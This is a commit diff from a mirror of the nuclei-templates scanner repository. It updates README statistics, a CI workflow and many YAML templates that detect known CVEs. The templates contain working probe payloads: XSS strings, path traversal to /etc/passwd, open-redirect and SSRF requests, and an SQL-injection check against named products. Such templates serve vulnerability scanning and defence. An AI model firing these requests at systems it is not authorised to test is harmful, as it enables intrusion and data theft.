daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

patch-1
GwanYeong Kim 2022-02-03 18:01:45 +09:00
parent a96f336f15 da4f359316
commit 009bccc5f2
151 changed files with 4535 additions and 2926 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
.github/workflows/template-db-indexer.yml vendored Normal file
View File

@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog

3
.nuclei-ignore
View File

@ -7,10 +7,9 @@
# tags is a list of tags to ignore execution for
# unless asked for by the user.
tags:
tags:
- "fuzz"
- "dos"
- "misc"
# files is a list of files to ignore template execution
# unless asked for by the user.

2
CONTRIBUTING.md
View File

@ -60,7 +60,7 @@ git add .
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
**203 directories, 3004 files**.
**212 directories, 3054 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2425
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
| cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |

9
cnvd/2019/CNVD-2019-01348.yaml
View File

@ -4,9 +4,14 @@ info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5
cwe-id: CWE-276
requests:
- method: GET
@ -27,3 +32,5 @@ requests:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
condition: and
# Enhanced by mp on 2022/01/26

2
contributors.json
View File

@ -643,7 +643,7 @@
"author": "forgedhallpass",
"links": {
"github": "https://www.github.com/forgedhallpass",
"twitter": "",
"twitter": "https://twitter.com/forgedhallpass",
"linkedin": "",
"website": "",
"email": ""

8
cves/2000/CVE-2000-0114.yaml
View File

@ -5,10 +5,13 @@ info:
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
remediation: Upgrade to the latest version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft
classification:
cve-id: CVE-2000-0114
requests:
- method: GET
@ -24,4 +27,7 @@ requests:
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
- "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

13
cves/2004/CVE-2004-0519.yaml
View File

@ -4,9 +4,14 @@ info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
tags: xss,squirrelmail,cve2004,cve
classification:
cve-id: CVE-2004-0519
requests:
- method: GET
@ -28,3 +33,7 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

7
cves/2008/CVE-2008-6172.yaml
View File

@ -4,11 +4,14 @@ info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
classification:
cve-id: CVE-2008-6172
requests:
- method: GET
@ -25,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/01/27

2
cves/2014/CVE-2014-4535.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:

2
cves/2014/CVE-2014-4544.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and
matchers:

4
cves/2014/CVE-2014-4550.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2014/CVE-2014-4558.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:

2
cves/2014/CVE-2014-4561.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:

4
cves/2014/CVE-2014-4592.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

11
cves/2014/CVE-2014-8682.yaml
View File

@ -5,16 +5,19 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- http://www.securityfocus.com/bid/71187
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- http://gogs.io/docs/intro/change_log.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
- http://www.exploit-db.com/exploits/35238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
tags: cve,cve2014,sqli,gogs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2014-8682
cwe-id: CWE-89
metadata:
shodan-query: 'title:"Sign In - Gogs"'
@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/01

1
cves/2016/CVE-2016-10956.yaml
View File

@ -30,3 +30,4 @@ requests:
- type: status
status:
- 200
- 500

27
cves/2016/CVE-2016-3978.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2016-3978
info:
name: FortiOS (Fortinet) - Open Redirect and XSS
author: 0x_Akoko
severity: medium
description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
reference:
- https://seclists.org/fulldisclosure/2016/Mar/68
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
tags: cve,cve2016,redirect,fortinet,fortios
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-3978
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2017/CVE-2017-5638.yaml
View File

@ -3,7 +3,7 @@ info:
author: Random_Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce,apache
reference: https://github.com/mazen160/struts-pwn
classification:
@ -25,4 +25,4 @@ requests:
- type: word
words:
- "X-Hacker: Bounty Plz"
part: header
part: header

13
cves/2017/CVE-2017-7391.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2017-7391
info:
name: Magmi Cross-Site Scripting v.0.7.22
name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
@ -25,12 +25,13 @@ requests:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(document.domain);</script><'
part: body
- type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words:
- "text/html"
part: header

2
cves/2018/CVE-2018-10818.yaml
View File

@ -4,7 +4,7 @@ info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247

2
cves/2018/CVE-2018-10822.yaml
View File

@ -4,7 +4,7 @@ info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
reference:
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822

2
cves/2018/CVE-2018-1273.yaml
View File

@ -10,7 +10,7 @@ info:
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce,spring
classification:

16
cves/2018/CVE-2018-13380.yaml
View File

@ -2,34 +2,38 @@ id: CVE-2018-13380
info:
name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v
author: shelld3v,AaronChen0
severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss,fortinet
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-13380
cwe-id: CWE-79
tags: cve,cve2018,fortios,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(1337)>"
part: body
- "<script>alert(1337)</script>"
condition: or
- type: word
part: header
words:
- "application/json"
part: header
negative: true
- type: status

4
cves/2018/CVE-2018-17254.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: critical
@ -27,3 +27,5 @@ requests:
part: body
words:
- "nuclei-template"
# Enhanced by cs on 2022/02/01

49
cves/2019/CVE-2019-13396.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2019-13396
info:
name: FlightPath Local File Inclusion
author: 0x_Akoko,daffainfo
severity: high
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
reference:
- https://www.exploit-db.com/exploits/47121
- https://www.cvedetails.com/cve/CVE-2019-13396/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-13396
cwe-id: CWE-22
tags: cve,cve2019,flightpath,lfi
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
group: 1
internal: true
regex:
- "idden' name='form_token' value='([a-z0-9]+)'>"

1
cves/2019/CVE-2019-9618.yaml
View File

@ -31,3 +31,4 @@ requests:
- type: status
status:
- 200
- 500

38
cves/2020/CVE-2020-18268.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 Open redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-18268
cwe-id: CWE-601
tags: cve,cve2020,redirect,zblogphp,authenticated
requests:
- raw:
- |
POST /zb_system/cmd.php?act=verify HTTP/1.1
Host: {{Hostname}}
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Connection: close
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
cves/2020/CVE-2020-24186.yaml
View File

@ -4,7 +4,7 @@ info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins
severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
classification:

6
cves/2020/CVE-2020-35489.yaml
View File

@ -29,9 +29,9 @@ requests:
- "Contact Form 7"
part: body
- type: regex
regex:
- '^== Changelog =="'
- type: word
words:
- '== Changelog =='
part: body
- type: regex

31
cves/2020/CVE-2020-36365.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36365
cwe-id: CWE-601
metadata:
shodan-query: http.html:'content="Smartstore'
tags: cve,cve2020,redirect,smartstore
requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
cves/2020/CVE-2020-8813.yaml
View File

@ -4,7 +4,7 @@ info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
author: gy741
severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
tags: cve,cve2020,cacti,rce,oast

38
cves/2021/CVE-2021-21973.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-21973
info:
name: VMware vCenter Unauthenticated SSRF
author: pdteam
severity: medium
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
- https://twitter.com/osama_hroot/status/1365586206982082560
- https://twitter.com/bytehx343/status/1486582542807420928
tags: cve,cve2021,vmware,ssrf,vcenter,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-21973
cwe-id: CWE-918
requests:
- raw:
- |
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
Host: {{Hostname}}
Vcip: {{interactsh-url}}
Vcpassword: {{rand_base(6)}}
Vcusername: {{rand_base(6)}}
Reqresource: {{rand_base(6)}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "The server sent HTTP status code 200"

32
cves/2021/CVE-2021-24838.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-24838
info:
name: AnyComment <= 0.2.21 - Open Redirect
author: noobexploiter
severity: medium
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
tags: wordpress,wp-plugin,open-redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24838
cwe-id: CWE-601
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 302

34
cves/2021/CVE-2021-25864.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
metadata:
shodan-query: title:"NODE-RED"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-25864
cwe-id: CWE-22
tags: cve,cve2021,huemagic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

2
cves/2021/CVE-2021-26084.yaml
View File

@ -4,7 +4,7 @@ info:
author: dhiyaneshDk,philippedelteil
severity: critical
name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
